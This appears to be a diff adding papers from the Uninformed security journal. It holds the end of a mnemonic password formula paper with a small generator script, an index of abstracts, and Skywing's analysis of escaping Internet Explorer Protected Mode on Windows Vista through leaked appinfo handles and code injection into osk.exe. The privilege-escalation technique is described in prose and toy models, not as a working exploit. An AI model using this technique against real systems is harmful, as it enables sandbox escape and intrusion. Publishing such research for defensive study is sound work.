element being prepended could be the first letter of the system's managing
|
||||
entity:
|
||||
|
||||
<x>:<u>@<h|n>.<d|n>;
|
||||
|
||||
<x> could be replaced by ``p'' for a personal system, ``E'' for a system
|
||||
within Exxon-Mobil's management domain, or ``A'' for a system managed by
|
||||
the Austin Hackers Association. Most of the elements used thus far are
|
||||
relatively simple variable elements that derive their value from other
|
||||
known contextual information such as user or system name. The contrast is
|
||||
that those simple elements vary only in how their value changes when the MPF
|
||||
is applied to different systems. Variable elements change values in
|
||||
relation to the context of the class of access or due to a number of other
|
||||
factors outside the basic ``user/system'' context.
|
||||
|
||||
|
||||
To illustrate this concept, the use of the same MPF for a super-user and an
|
||||
unprivileged user account on the same system may result in passwords that
|
||||
only differ slightly. Including a variable element can help to mitigate
|
||||
this similarity. Prepending the characters ``0:'' or ``1:'' to the
resultant password, to indicate super-user versus unprivileged user access
respectively, by including an additional variable element in the MPF
increases the password's complexity and also indicates the class of
access.
|
||||
|
||||
Variable elements are not required to prepend the beginning of the formula
|
||||
as with the examples above; they can be easily appended or inserted
|
||||
anywhere within the MPF.
|
||||
|
||||
- Rotating and Incrementing Elements
|
||||
|
||||
Rotating and incrementing elements can be included to assist in managing
|
||||
password changes required to conform to password rotation policies. A
|
||||
rotating element is one which rotates through a predefined list of values
|
||||
such as "apple", "orange", "banana", etc. An incrementing element such as
|
||||
the one represented below by <#> is derived from an open-ended linear sequence
|
||||
of values incremented through such as "1", "2", "3" or "one", "two",
|
||||
"three". When a password rotation policy dictates that a password must be
|
||||
changed, rotate or increment the appropriate elements:
|
||||
|
||||
<u>@<h|n>.<d|n>;<#>
|
||||
|
||||
The above MPF results in passwords like "d@c.g;1", "d@c.g;2", "d@c.g;3",
|
||||
etc. To further illustrate this principle, consider the following MPF:
|
||||
|
||||
<u>@<h|n>.<d|n>;<fruit>
|
||||
|
||||
The above MPF, when used with the predefined list of fruit values mentioned
|
||||
above, yields passwords like "d@c.g;apple", "d@c.g;orange", "d@c.g;banana",
|
||||
etc.
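
The two element types can be sketched as follows. The function names and the
host core.example.org are hypothetical, and the sketch follows the formulas
literally, so the literal semicolon separates the base password from the
rotating or incrementing value.

```python
from itertools import cycle


def base_password(user, system):
    """Apply <u>@<h|n>.<d|n>; (the part of the MPF that never changes)."""
    parts = system.split(".")
    return f"{user[0]}@{parts[0][0]}.{parts[-1][-1]};"


def incrementing_passwords(user, system, count):
    """Successive passwords for an open-ended numeric <#> element."""
    base = base_password(user, system)
    return [f"{base}{n}" for n in range(1, count + 1)]


def rotating_passwords(user, system, values, count):
    """Successive passwords for an element rotating through a fixed list."""
    base = base_password(user, system)
    wheel = cycle(values)  # wraps back to the first value when exhausted
    return [f"{base}{next(wheel)}" for _ in range(count)]


if __name__ == "__main__":
    print(incrementing_passwords("druid", "core.example.org", 3))
    print(rotating_passwords("druid", "core.example.org",
                             ["apple", "orange", "banana"], 4))
```

A rotating element eventually repeats, so a password history policy that is
longer than the list will reject it; an incrementing element does not have
that limitation.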
|
||||
|
||||
The only additional pieces of information that the user must remember other
|
||||
than the MPF itself are the predefined list of values in the rotating
|
||||
element, and the current value of the rotating or incrementing element.
|
||||
|
||||
In the case of rotating elements this list of values may potentially be
|
||||
written down for easy reference without compromising the security of the
|
||||
password itself. Lists may further be obscured by utilizing certain
|
||||
values, like a grocery list or a list of company employees and telephone
|
||||
extensions that may already be posted within the user's environment. In
|
||||
the case of incrementing elements, knowledge of the current value should be
|
||||
all that is required to determine the next value.
|
||||
|
||||
3.4) Enterprise Considerations
|
||||
|
||||
Large organizations could use MPFs assigned to specific users to facilitate
|
||||
dual-access to a user's accounts across the enterprise. If the enterprise's
|
||||
Security Operations group assigns unique MPFs to its users, Security Officers
|
||||
would then be able to access the user's accounts without intrusively modifying
|
||||
the user's account or password. This type of management could be used for
|
||||
account access when a user is absent or indisposed, shared account access among
|
||||
multiple staff members or within an operational group, or even surveillance of
|
||||
a suspected user by the Security Operations group.
|
||||
|
||||
3.5) Weaknesses
|
||||
|
||||
3.5.1) The ``Skeleton Key'' Effect
|
||||
|
||||
The most significant weakness of passwords generated by MPFs is that when the
|
||||
formula becomes compromised, all passwords to systems for which the user is
|
||||
using the respective MPF schema are potentially compromised. This situation is
|
||||
no worse than a user simply using the same password on all systems. In fact,
|
||||
it is significantly better due to the resultant passwords being individually
|
||||
unique. When using a password generated by an MPF, the password should be
|
||||
unique per system and ideally appear to be a random string of characters. In
|
||||
order to compromise the formula, an attacker would likely have to crack a
|
||||
significant number of systems' passwords which were generated by the formula
|
||||
before being able to identify the correlation between them.
|
||||
|
||||
3.5.2) Complexity Through Password Policy
|
||||
|
||||
A second weakness of MPF generated passwords is that without rotating or
|
||||
incrementing elements, they are not very resilient to password expiration or
|
||||
rotation policies. There exists a trade-off between increased password
|
||||
security via expiring passwords and MPF complexity. However, the trade-off is
|
||||
either to have both, or neither. The more secure option is to use both,
|
||||
however, this practice increases the complexity of the MPF potentially causing
|
||||
it to not meet design goal number four.
|
||||
|
||||
6) Conclusion
|
||||
|
||||
MPFs can effectively mitigate many of the existing risks of complex password
|
||||
selection and management by users. However, their complexity and mnemonic
|
||||
properties must be managed very carefully in order to achieve a comfortable
|
||||
level of password security while also maintaining memorability. Users may
|
||||
reintroduce many of the problems MPFs intend to solve when the formulas become too
|
||||
complex for users to easily remember.
|
||||
|
||||
References
|
||||
|
||||
[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans
|
||||
http://www.cs.uno.edu/Resources/FAQ/faq4.html
|
||||
|
||||
[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords
|
||||
http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html
|
||||
|
||||
[3] McWilliams, Brian. How Paris Got Hacked?
|
||||
http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html
|
||||
|
||||
[4] Williams, Randall T. The Passphrase FAQ
|
||||
http://www.iusmentis.com/security/passphrasefaq/
|
||||
|
||||
[5] Jeff Jianxin Yan and Alan F. Blackwell and Ross J. Anderson and Alasdair Grant. Password Memorability and Security: Empirical Results
|
||||
http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81
|
19
uninformed/7.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
|
||||
|
||||
Exploitation Technology
|
||||
Reducing the Effective Entropy of GS Cookies
|
||||
skape
|
||||
This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.
|
||||
pdf | code.tgz | html | txt
|
||||
|
||||
General Research
|
||||
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
|
||||
skape
|
||||
This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.
|
||||
pdf | code.tgz | html | txt
|
||||
|
||||
Mnemonic Password Formulas
|
||||
I)ruid
|
||||
The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.
|
||||
pdf | html | txt
|
||||
|
1723
uninformed/8.1.txt
Normal file
File diff suppressed because it is too large
Load diff
1111
uninformed/8.2.txt
Normal file
File diff suppressed because it is too large
Load diff
362
uninformed/8.3.txt
Normal file
|
@ -0,0 +1,362 @@
|
|||
Getting out of Jail: Escaping Internet Explorer Protected Mode
|
||||
September, 2007
|
||||
Skywing
|
||||
Skywing@valhallalegends.com
|
||||
http://www.nynaeve.net
|
||||
|
||||
Abstract: With the introduction of Windows Vista, Microsoft has added a new
|
||||
form of mandatory access control to the core operating system. Internally
|
||||
known as "integrity levels", this new addition to the security manager allows
|
||||
security controls to be placed on a per-process basis. This is different from
|
||||
the traditional model of per-user security controls used in all prior versions
|
||||
of Windows NT. In this manner, integrity levels are essentially a bolt-on to
|
||||
the existing Windows NT security architecture. While the idea is
|
||||
theoretically sound, there does exist a great possibility for implementation
|
||||
errors with respect to how integrity levels work in practice. Integrity
|
||||
levels are the core of Internet Explorer Protected Mode, a new "low-rights"
|
||||
mode where Internet Explorer runs without permission to modify most files or
|
||||
registry keys. This places both Internet Explorer and integrity levels as a
|
||||
whole at the forefront of the computer security battle with respect to Windows
|
||||
Vista.
|
||||
|
||||
1) Introduction
|
||||
|
||||
Internet Explorer Protected Mode is a reduced-rights operational mode of
|
||||
Internet Explorer where the security manager itself enforces a policy of not
|
||||
allowing write access to most file system, registry, and other securable
|
||||
objects by default. This mode does provide special sandbox file system and
|
||||
registry space that is permitted to be written to by Internet Explorer when
|
||||
operating in Protected Mode.
|
||||
|
||||
While there exist some fundamental shortcomings of Protected Mode as it is
|
||||
currently implemented, such as an inability to protect user data from being
|
||||
read by a compromised browser process, it has been thought to be effective at
|
||||
blocking most write access to the system from a compromised browser. The
|
||||
benefit of this is that if one is using Internet Explorer and a buffer overrun
|
||||
occurs within IExplore.exe, the persistent impact should be lessened. For
|
||||
example, instead of having write access to everything accessible to the user's
|
||||
account, exploit code would instead be limited to being able to write to the
|
||||
low integrity section of the registry and the low integrity temporary files
|
||||
directories. This greatly impacts the ability of malware to persist itself or
|
||||
compromise a computer beyond just IExplore.exe without some sort of user
|
||||
interaction (such as persuading a user to launch a program from an untrusted
|
||||
location with full rights, or other social engineering attacks).
|
||||
|
||||
2) Protected Mode and Integrity Levels
|
||||
|
||||
Internally, Protected Mode is implemented by running IExplore.exe as a low
|
||||
integrity process. With the default security descriptor that is applied to
|
||||
most securable objects, low integrity processes may not generally request
|
||||
access rights that map to GENERIC_WRITE for a particular object. As Internet
|
||||
Explorer does need to be able to persist some files and settings, exceptions
|
||||
can be (and are) carved out for low integrity processes in the form of registry
|
||||
keys and directories with special security descriptors that grant the ability
|
||||
for low integrity processes to request write access. Because the IExplore
|
||||
process cannot write files to a location that would be automatically used
|
||||
by a higher integrity process, and it cannot request dangerous access
|
||||
rights to other running processes (such as the ability to inject code via
|
||||
requesting PROCESS_VM_WRITE or the like), malware that runs in the context of
|
||||
a compromised IExplore process is (theoretically) fairly contained from the
|
||||
rest of the system.
|
||||
|
||||
However, this containment only holds as long as the system happens to be free
|
||||
of implementation errors. Alas, but perhaps not unexpectedly, there are in
|
||||
fact implementation problems in the way the system manages processes running
|
||||
at differing integrity levels that can be leveraged to break out of the
|
||||
Protected Mode (or low integrity) jail. To understand these implementation
|
||||
errors, it is first necessary to gain a basic working understanding of how the
|
||||
new integrity-based security model works in Windows. The integrity model is
|
||||
key to a number of Windows Vista features, including UAC (User Account
|
||||
Control).
|
||||
|
||||
When a user logs on to a computer in Windows Vista with UAC enabled, their
|
||||
shell is normally started as a ``medium'' integrity process (integrity levels
|
||||
are integers and symbolic designations such as ``low'', ``medium'', ``high'',
|
||||
or ``system'' are simply used to indicate certain well-known intermediate
|
||||
values). Medium integrity is the default integrity level even for built-in
|
||||
administrators (except the default ``Administrator'' account, which is a
|
||||
special case and is exempted from UAC). Most day to day activity is intended
|
||||
to be performed at medium integrity; for instance, a word processor program
|
||||
would be expected to operate at medium integrity, and (theoretically) games
|
||||
would generally run at medium integrity as well. Games tend to be rather
|
||||
poorly written in terms of awareness of the security system, however, so this
|
||||
tends to not really be the case, at least not without added help from the
|
||||
operating system. Medium integrity roughly corresponds to the environment
|
||||
that a limited user would run as under previous versions of Windows. That is
|
||||
to say, the user has read and write access to their own user profile and their
|
||||
own registry hive, but not write access to the system as a whole.
|
||||
|
||||
Now, when a user launches Internet Explorer, an IExplore.exe process is
|
||||
launched as low integrity. The default security descriptor for most objects
|
||||
on Windows prevents low integrity processes from gaining write access to
|
||||
medium integrity securable objects, as previously mentioned. In reality, the
|
||||
default security descriptor denies write access to higher integrities, not
|
||||
just to medium integrity, though in this case the effect is similar in terms
|
||||
of Internet Explorer. As a result, the IExplore.exe process cannot write
|
||||
directly to most locations on the system.
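
The default "no write up" behavior can be modeled with a simple comparison
of integrity values. This is a deliberately simplified sketch, not how the
security manager is implemented: it ignores discretionary ACLs, the
exceptions carved out for the low integrity sandbox, and read or execute
policies. Only the high integrity value (0x3000) appears in this paper; the
other values are the well-known mandatory label RIDs, and the names used
here are hypothetical.

```python
from enum import IntEnum


class Integrity(IntEnum):
    """Well-known integrity levels; any integer in between is also valid."""
    LOW = 0x1000
    MEDIUM = 0x2000
    HIGH = 0x3000
    SYSTEM = 0x4000


def write_allowed(subject_level, object_level):
    """Model of the default policy: writes are denied to higher integrities."""
    return subject_level >= object_level


if __name__ == "__main__":
    # A Protected Mode IExplore.exe (low) against a medium integrity object.
    print(write_allowed(Integrity.LOW, Integrity.MEDIUM))
    # The same process against an object inside the low integrity sandbox.
    print(write_allowed(Integrity.LOW, Integrity.LOW))
```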
|
||||
|
||||
However, Internet Explorer does, in certain cases, need to gain write access to
|
||||
locations outside of the low integrity (Protected Mode) sandbox. For this
|
||||
task, Internet Explorer relies on a helper process, known as ieuser.exe, which
|
||||
runs at medium integrity level. There is a tightly controlled RPC interface
|
||||
between ieuser.exe and IExplore.exe that allows Internet Explorer, running at
|
||||
low integrity, to request that ieuser.exe display a dialog box asking the user
|
||||
to, say, choose a save location for a file and then save said file to disk.
|
||||
This is the mechanism by which one can save files in their home directory even
|
||||
under Protected Mode. Because the RPC interface only allows IExplore.exe
|
||||
to use the RPC interface to request that a file be saved, a program cannot
|
||||
directly abuse the RPC interface to write to arbitrary locations, at least not
|
||||
without user interaction.
|
||||
|
||||
Part of the reason why the RPC interface cannot be trivially abused is that
|
||||
there also exists some protection baked into the window manager that prevents
|
||||
a thread at a lower integrity level from sending certain, potentially
|
||||
dangerous, messages to threads at a higher integrity level. This allows
|
||||
ieuser.exe to safely display user interface on the same desktop as the
|
||||
IExplore.exe process without malicious code in the Internet Explorer process
|
||||
simply being able to simulate fake keystrokes in order to cause it to save a
|
||||
dangerous file to a dangerous location without user interaction.
|
||||
|
||||
Most programs that are integrity-level aware operate with the same sort of
|
||||
paradigm that Internet Explorer does. In such programs, there is typically a
|
||||
higher integrity broker process that provides a tightly controlled interface
|
||||
to request that certain actions be taken, with the consent of the user. For
|
||||
example, UAC has a broker process (a privileged service) that is responsible
|
||||
for displaying the consent user interface when the user tries to perform an
|
||||
administrative task. This operates similarly in principle to how Internet
|
||||
Explorer can provide a security barrier through Protected Mode because the
|
||||
lower privileged process (the user program) cannot magically elevate itself
|
||||
to full administrative rights in the UAC case (which runs a program at high
|
||||
integrity level, as opposed to the default medium integrity level).
|
||||
Instead, it could only ask the service to display the consent UI, which is
|
||||
protected from interference by the program requesting elevation due to the
|
||||
window manager restrictions on sending dangerous messages to a higher
|
||||
integrity level window.
|
||||
|
||||
3) Breaking the Broker
|
||||
|
||||
If one has been using Windows Vista for some time, none of the behavior that
|
||||
has just been described should come across as new. However, there are some
|
||||
cases that have not yet been discussed which one might have observed from time
|
||||
to time with Windows Vista. For example, although programs are typically
|
||||
restricted from being able to synthesize input across integrity levels, there
|
||||
are some limited circumstances where this is permitted. One easy to see
|
||||
instance of this is the on-screen keyboard program (osk.exe) which, despite
|
||||
running without a UAC prompt, can generate keyboard input messages that are
|
||||
transmitted to other processes, even elevated administrative processes. This
|
||||
would at first appear to be a break in the security system; questions along
|
||||
the lines of "If one program can magically send keystrokes to higher integrity
|
||||
processes, why can't another?" come to mind. However, there are in fact some
|
||||
carefully-designed restrictions that are intended to prevent a user (or a
|
||||
program) from arbitrarily being able to execute custom code with this ability.
|
||||
|
||||
First of all, in order to request special access to send unrestricted keyboard
|
||||
input, a program's main executable must resolve to a path within the Program
|
||||
Files or Windows directory. Although the author feels that such a check is
|
||||
essentially a giant hack at best, it does effectively prevent a "plain user"
|
||||
running at medium integrity from being able to run custom code that can
|
||||
synthesize keystrokes to high integrity processes, as a plain user would not
|
||||
be able to write to any of these directories. Additionally, any such program
|
||||
must also be signed with a valid digital signature from any trusted code
|
||||
signing root. This is a fairly useless check from a security perspective, in
|
||||
the author's opinion, as anybody can pay a code signing authority to get a
|
||||
code signing certificate in their own name; code signing certificates are not
|
||||
a guarantee of malware-free (or even bug-free) code. Although it would be
|
||||
easy to bypass the second check with a payment to a certificate issuing
|
||||
authority, a plain user cannot so easily bypass the first check relating to
|
||||
the restriction on where the program main executable may be located.
|
||||
|
||||
Even if a user cannot launch custom code directly as a program with access to
|
||||
simulate keystrokes to higher integrity processes (known as "uiaccess"
|
||||
internally), one would tend to get the impression that it would be possible to
|
||||
simply inject code into a running osk.exe instance (or other process with
|
||||
uiaccess). This fails as well, however; the process that is responsible for
|
||||
launching osk.exe (the same broker service that is responsible for launching
|
||||
the UAC consent user interface, the "Application Information" (appinfo)
|
||||
service) creates osk.exe with a higher than normal integrity level in order to
|
||||
use the integrity level security mechanism to block users from being able to
|
||||
inject code into a process with access to simulate keystrokes.
|
||||
|
||||
When the appinfo service receives a request to launch a program that may
|
||||
require elevation, which occurs when ShellExecute is called to start a
|
||||
program, it will inspect the user's token and the application's manifest to
|
||||
determine what to do. The application manifest can specify that a program
|
||||
runs with the user's integrity level, that it needs to be elevated (in which
|
||||
case a consent user interface is launched), that it should be elevated if and
|
||||
only if the current user is a non-elevated administrator (otherwise the
|
||||
program is to be launched without elevation), or that the program requests the
|
||||
ability to perform keystroke simulation to high integrity processes.
|
||||
|
||||
In the case of a launch request for a program requesting uiaccess,
|
||||
appinfo!RAiLaunchAdminProcess is called to service the request. The process
|
||||
is then verified to be within the (hardcoded) set of allowed directories by
|
||||
appinfo!AiCheckSecureApplicationDirectory. After validating that the program
|
||||
is being launched from within an allowed directory, control is eventually
|
||||
passed to appinfo!AiLaunchProcess which performs the remaining work necessary
|
||||
to service the launch request. At this point, due to the "secure" application
|
||||
directory requirement, it is not possible for a limited user (or a user
|
||||
running with low integrity, for that matter) to place a custom executable in
|
||||
any of the "secure" application directories.
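
The kind of check described above can be illustrated with a purely lexical
path comparison. This is a hypothetical model only: the paper does not give
the actual directory list or the matching rules used by
appinfo!AiCheckSecureApplicationDirectory, so the SECURE_DIRS values and the
function names below are assumptions.

```python
import ntpath

# Assumed stand-ins for the hardcoded "secure" directories.
SECURE_DIRS = (r"C:\Program Files", r"C:\Windows")


def _canonical(path):
    """Collapse '..' segments and normalize case and separators."""
    return ntpath.normcase(ntpath.normpath(path))


def in_secure_directory(exe_path, secure_dirs=SECURE_DIRS):
    """Return True if exe_path lies beneath one of the secure directories."""
    candidate = _canonical(exe_path)
    for directory in secure_dirs:
        # Require a separator after the root so that C:\WindowsEvil
        # does not match C:\Windows.
        if candidate.startswith(_canonical(directory) + "\\"):
            return True
    return False


if __name__ == "__main__":
    print(in_secure_directory(r"C:\Windows\System32\osk.exe"))
    print(in_secure_directory(r"C:\Windows\..\Users\bob\evil.exe"))
```

The path is normalized before comparison because a naive prefix match would
accept paths that climb back out of the directory with "..". A real
implementation would also have to deal with links and other file system
redirection, which a lexical check cannot see.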
|
||||
|
||||
Now, the appinfo service is capable of servicing requests from processes of
|
||||
all integrity levels. Due to this fact, it needs to be capable of determining
|
||||
the correct integrity level at which to create a new process at this point.
|
||||
Because the new process is not being launched as a full administrator in the
|
||||
case of a process requesting uiaccess, no consent user interface is displayed
|
||||
for elevation. However, the appinfo service does still need a way to protect
|
||||
the new process from any other processes running as that user (as access to
|
||||
synthesize keystrokes is considered sensitive). For this task, the
|
||||
appinfo!LUASetUIAToken function is called by appinfo to protect the new
|
||||
process from other plain user processes running as the calling user. This
|
||||
is accomplished by adjusting the token that will be used to create the new
|
||||
process to run at a higher integrity level than the caller, unless the
|
||||
caller is already at high integrity level (0x3000). The way LUASetUIAToken
|
||||
does this is to first try to query the linked token associated with the
|
||||
caller's token. A linked token is a second, shadow token that is assigned
|
||||
when a computer administrator logs in with UAC enabled; in the UAC case,
|
||||
the user normally runs as a restricted version of themselves, without their
|
||||
administrative privileges (or Administrators group membership), and at
|
||||
medium integrity level.
|
||||
|
||||
If the calling user does indeed have a linked token, LUASetUIAToken retrieves
|
||||
the integrity level of the linked token for use with the new process.
|
||||
However, if the user doesn't have a linked token (i.e. they are logged on as a
|
||||
true plain user and not an administrator running without administrative
|
||||
privileges), then LUASetUIAToken uses the integrity level of the caller's
|
||||
token instead of the token linked with the caller's token (in other words, the
|
||||
elevation token). In the case of a computer administrator this approach would
|
||||
normally provide sufficient protection; however, for a limited user, there
|
||||
exists a small snag. Specifically, the integrity level that LUASetUIAToken
|
||||
has retrieved matches the integrity level of the caller, so the caller would
|
||||
still have free rein over the process.
|
||||
|
||||
To counteract this issue, there is an additional check baked into
|
||||
LUASetUIAToken to determine if the integrity level that was selected is at (or
|
||||
above) high integrity. If the integrity level is lower than high integrity,
|
||||
LUASetUIAToken adds 16 to the integrity level (although integrity levels are
|
||||
commonly thought of as just having four values, that is, low, medium, high,
|
||||
and system, there are 0x1000 unnamed integrity levels in between each named
|
||||
integrity level). So long as the numeric value of the integrity level chosen
|
||||
is greater than the caller's integrity level, the new process will be
|
||||
protected from the caller. In the case of the caller already being a full,
|
||||
elevated administrator, there's nothing to protect against, so LUASetUIAToken
|
||||
doesn't attempt to raise the integrity level above high integrity.
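
The selection logic described above can be summarized in a short model. This
is only a sketch in Python under stated assumptions: the function name and its
parameters are hypothetical and are not the real signature of LUASetUIAToken.
Only the named integrity level values and the increment of 16 are taken from
the text, and only the cases the text spells out are modeled.

```python
# Named mandatory integrity levels (RID values).
LOW_IL = 0x1000
MEDIUM_IL = 0x2000
HIGH_IL = 0x3000
SYSTEM_IL = 0x4000

UIA_INCREMENT = 16  # per the text: added when the level is below high


def select_uiaccess_integrity(caller_il, linked_il=None):
    """Toy model of the integrity level chosen for a uiaccess process.

    caller_il -- integrity level of the caller's token
    linked_il -- integrity level of the linked (elevation) token, or None
                 if the caller has no linked token (a true plain user)
    """
    # Prefer the linked token's level; fall back to the caller's own level.
    selected = linked_il if linked_il is not None else caller_il
    # Below high integrity, nudge the level up so it exceeds the caller's.
    if selected < HIGH_IL:
        selected += UIA_INCREMENT
    return selected
```

Under this model, a low integrity caller with no linked token yields 0x1010,
while a low integrity caller whose linked token is at high integrity yields
0x3000.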
|
||||
|
||||
After determining a final integrity level, LUASetUIAToken changes the
|
||||
integrity level in the token that will be used to launch the new process to
|
||||
match the desired integrity level. At this point, appinfo is ready to create
|
||||
the process. If needed, the user profile block is loaded and an environment
|
||||
block is created, following which advapi32!CreateProcessAsUser is called to
|
||||
launch the uiaccess-enabled application for the caller with a raised integrity
|
||||
level. After the process is created, the output parameters of
|
||||
CreateProcessAsUser are marshalled back into the caller's process, and
|
||||
AiLaunchProcess signals successful completion to the caller.
|
||||
|
||||
If one has been following along so far, the question of ``How does all of this
|
||||
relate to Internet Explorer Protected Mode'' has probably crossed one's mind.
|
||||
It turns out that there's a slight deficiency in the protocol outlined above
|
||||
with respect to creating uiaccess processes. The problem lies in the fact
|
||||
that AiLaunchProcess returns the output parameters of CreateProcessAsUser back
|
||||
to the caller's process. This is dangerous, because in the Windows security
|
||||
model, security checks are done when one attempts to open a handle; after a
|
||||
handle is opened, the access rights requested are forever more associated with
|
||||
that handle, regardless of who uses the handle. In the case of appinfo, this
|
||||
turns out to be a real problem because appinfo, being the creator of the new
|
||||
process, is handed back a thread and process handle that grant full access to
|
||||
the new thread and process, respectively. Appinfo then marshals these handles
|
||||
back to the caller (which may be running at low integrity level). At this
|
||||
point, a privilege escalation problem has occurred; the caller has been
|
||||
essentially handed the keys to a higher integrity process. While the caller
|
||||
would never normally be able to open a handle to the new process on its own,
|
||||
in this case, it doesn't have to, as the appinfo service does so on its behalf
|
||||
and returns the handles back to it.
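
The handle problem can be illustrated with a toy model. This is a sketch and
not Windows code: the classes, the function names, and the access constant are
all hypothetical, and the access check is simplified to a plain integrity
level comparison. What it shows is that the check runs once, when a handle is
opened, and that a handle passed along by a broker carries its access with it.

```python
LOW_IL, MEDIUM_IL, HIGH_IL = 0x1000, 0x2000, 0x3000
PROCESS_ALL_ACCESS = "all-access"  # placeholder, not the real access mask


class Process:
    def __init__(self, name, integrity):
        self.name = name
        self.integrity = integrity


class Handle:
    """A handle remembers the access granted when it was opened."""

    def __init__(self, target, access):
        self.target = target
        self.access = access


def open_process(opener, target, access):
    # The access check happens here, once, at open time.
    if opener.integrity < target.integrity:
        raise PermissionError("lower integrity opener denied")
    return Handle(target, access)


def write_memory(handle, data):
    # No check against whoever is using the handle now: only the access
    # recorded in the handle matters.
    if handle.access != PROCESS_ALL_ACCESS:
        raise PermissionError("handle lacks access")
    return len(data)


def broker_launch(caller, image, integrity):
    """Hypothetical broker: creates a process and returns its handle."""
    child = Process(image, integrity)
    # The creator's full-access handle is passed straight to the caller,
    # whose own integrity level is never consulted.
    return Handle(child, PROCESS_ALL_ACCESS)
```

In this model a low integrity caller fails open_process against a high
integrity target, yet can use write_memory freely on the handle returned by
broker_launch.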
|
||||
|
||||
Now, in the ShellExecute case, the client stub for the appinfo
|
||||
AiLaunchAdminProcess routine doesn't want (or need) the process or thread
|
||||
handles, and closes them immediately after. However, this is obviously not a
|
||||
security barrier, as this code is running in the untrusted process and could
|
||||
be patched out. As such, there exists a privilege escalation hole of sorts
|
||||
with the appinfo service. It can be abused to, without user interaction, leak
|
||||
a handle to a higher integrity process to a low integrity process (such as
|
||||
Internet Explorer when operating in Protected Mode). Furthermore, even
|
||||
Internet Explorer in Protected Mode, running at low integrity, can request to
|
||||
launch an already-existing uiaccess-flagged executable, such as osk.exe (which
|
||||
is conveniently already in a "secure" application directory, the Windows
|
||||
system directory). With a process and thread handle as returned by appinfo,
|
||||
it is possible to inject code into the new process, and from there, as they
|
||||
say, the rest is history.
|
||||
|
||||
3) Caveats
|
||||
|
||||
Although the problem outlined in this article is indeed a privilege escalation
|
||||
hole, there are some limitations to it. First of all, if the caller is
|
||||
running as a plain user instead of a non-elevated administrator, appinfo
|
||||
creates the uiaccess process with integrity level 0x1010 (low integrity + 16).
|
||||
This is still less than medium integrity (0x2000), and thus in the true
|
||||
limited user case, the new process, while protected from other low integrity
|
||||
processes, is still unable to interfere with medium integrity processes
|
||||
directly.
|
||||
|
||||
In the case where a user is running as an administrator but is not elevated
|
||||
(which happens to be the default case for most Windows Vista users), it is
|
||||
true that appinfo returns a handle to a process running at high integrity
|
||||
level. However, only the integrity level is changed; the process is most
|
||||
certainly not an administrator (and in fact has BUILTIN\Administrators as a
|
||||
deny only SID). This does mean that the new process is quite capable of
|
||||
injecting code into any processes the user has started though (with zero user
|
||||
interaction). If the user happens to already have a high integrity process
|
||||
running on the desktop as a full administrator, the new process could be used
|
||||
to attack it as the process would be running at the same integrity level and
|
||||
it would additionally be running as the same user. This means that in the
|
||||
default configuration, this issue can be used to escape from Protected Mode,
|
||||
but one is still not given full-blown administrative access to the system.
|
||||
However, any location in the user profile directory could be written to. This
|
||||
effectively eliminates the security benefit of Protected Mode for a
|
||||
non-elevated administrator (with respect to treating the user as a plain
|
||||
user).
|
||||
|
||||
Source code to a simple program to demonstrate the appinfo service issue is
|
||||
included with the article. The problem is at this point expected to be fixed
|
||||
by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code
|
||||
launches osk.exe with ShellExecute, patches out the CloseHandle calls in
|
||||
ShellExecute to retain the process and thread handles, and then injects a
|
||||
thread into osk.exe that launches cmd.exe. The sample program also includes a
|
||||
facility to create a low integrity process to verify correct function; the
|
||||
intended use is to launch a low integrity command shell, verify that
|
||||
directories such as the user profile directory cannot be written to, and then
|
||||
use the sample program from the low integrity process to launch a medium
|
||||
integrity cmd.exe instance without user interaction, which does indeed have
|
||||
free rein of the user profile directory. The same code will operate in the
|
||||
context of Internet Explorer in Protected Mode, although in the interest of
|
||||
keeping the example clear and concise, the author has not included code to
|
||||
inject the sample program in some form into Internet Explorer (which would
|
||||
simulate an attack on the browser).
|
||||
|
||||
Note that while the uiaccess process is launched as a high integrity process,
|
||||
it is configured such that unless a token is explicitly provided that requests
|
||||
high integrity, new child processes of the uiaccess process will launch as
|
||||
medium integrity processes. It is possible to work around this issue and
|
||||
retain high integrity with the use of CreateProcessAsUser by code injected
|
||||
into the uiaccess process if desired. However, as described above, simply
|
||||
retaining high integrity does not provide administrative access on its own.
|
||||
If there are no other high integrity processes running as the current user on
|
||||
the current desktop, running as high integrity and running as medium integrity
|
||||
with the non-elevated token are functionally equivalent, for all intents and
|
||||
purposes.
|
||||
|
||||
4) Conclusion
|
||||
|
||||
UAC, Internet Explorer Protected Mode, and the integrity level model represent
|
||||
an entirely new way of thinking about security in the Windows world.
